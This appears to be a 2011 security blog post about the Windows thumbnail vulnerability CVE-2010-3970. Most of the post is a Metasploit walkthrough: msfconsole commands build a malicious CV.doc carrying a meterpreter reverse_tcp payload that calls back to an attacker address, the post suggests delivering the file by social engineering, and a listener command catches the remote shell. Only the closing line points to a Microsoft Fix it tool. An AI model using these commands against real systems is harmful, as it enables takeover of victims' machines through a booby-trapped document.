From Windows thumbnails vulnerability to remote shell

Beware of thubnails!

CVE-2010-3970 – Windows Graphics Rendering Engine vulnerability – is still a 0-day (9 January 2011) and the exploit is public.

Exploitation is pretty easy.The victim just needs to view a file like CV.doc in Windows Explorer – thumbnails mode – and the payload gets executed on a fully patched Windows XP SP3 machine.

This thumbnail (CV.doc)executes the Windows calculator:

Exploiting the thumbnail vulnerability CVE-2010-3970

Things can get more serious when the attacker is able to open a meterpreter session with the victim’s machine. This can also be easily accomplished with Metasploit:

1. Creating the malicious thumbnail in msfconsole:

msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
> show options
> set FILENAME CV.doc
> set OUTPUTPATH /root
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.84.1
> set LPORT 80
> exploit


2. Sending the thumbnail to the victim (e.g. by social engineering attack).

3. Listening for incoming connections on the attacker machine:

msf > use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.84.1
> set LPORT 80
> exploit


Et voila! The shell we were waiting for…

Meterpreter session open

Until a patch will be provided, Microsoft clients can use the Fix it tool described in this support page.